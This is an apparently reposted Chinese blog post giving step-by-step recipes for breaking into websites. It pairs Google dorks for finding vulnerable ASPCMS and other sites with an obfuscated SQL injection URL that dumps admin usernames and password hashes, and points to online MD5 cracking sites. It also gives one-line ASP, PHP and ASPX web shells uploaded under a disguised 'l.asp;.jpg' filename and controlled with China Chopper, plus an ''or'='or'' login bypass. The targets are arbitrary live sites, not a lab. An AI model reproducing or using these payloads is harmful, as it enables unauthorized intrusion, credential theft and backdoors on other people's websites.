• 渗透(龙帝)


    一、Powered by aspcms.com Copyright ?2010-2011

    步奏1.

    首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011

    步奏2.

    可以看到有许多站 随便进去一个

    接着利用注入漏洞

    /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

    把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面

    显示:

    发表于:2014-4-26 8:26:00 评论者:admin IP:
    ea42f1bc4322ef9d
    首页上一页1下一页末页


    ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd

    明文:ella98744

    步奏3.

    去登陆后台 

    ********************************************************************************

    原理1.

    Powered by aspcms.com Copyright ?2010-2011   注入原理

    (wait)

    原理2.

    MD5破解网站

    http://md5.syue.com/OtherSite-md5.Asp

    二、织梦内容管理系统 V57_GBK_SP1

    方法:织梦通杀工具 

    三、中国菜刀

    步奏1.

    <%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为

    然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个

    好了 把这个上传

    步奏2.

    用菜刀连接了

    原理

    菜刀

    参考 http://huaidan.org/archives/3472.html

    Asp环境:<%eval request("a")%>

    Php环境:<?php @eval($_POST['a']);?>

    Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

    四、inurl:download_ok.asp?

    步奏1.

    关键字:inurl:download_ok.asp?

    步奏2.后台

    /admin

    账户名和密码 输入 'or'='or'

    *扩展

    漏洞

    http://www.ihonker.org/forum.php?mod=viewthread&tid=5303&extra=page=1&orderby=dateline

    后台

    http://www.myhack58.com/Article/html/3/8/2014/49569.htm

  • 相关阅读:
    IT民工的时间哪儿来的
    解决Office2007安装时出现错误1706的方法
    情人节特献:有心之函数必然就有分手函数
    mathematica汉化 版本二
    项目经理职责与权利
    什么是产品经理?主要职责是什么?
    调查收藏
    如何在CLI命令行下运行PHP脚本,同时向PHP脚本传递参数?
    PHP的GC垃圾收集机制
    AWStats分析Tomcat\Apache\IIS\nginx 的访问日志
  • 原文地址:https://www.cnblogs.com/yaolei/p/4722369.html
Copyright © 2020-2023  润新知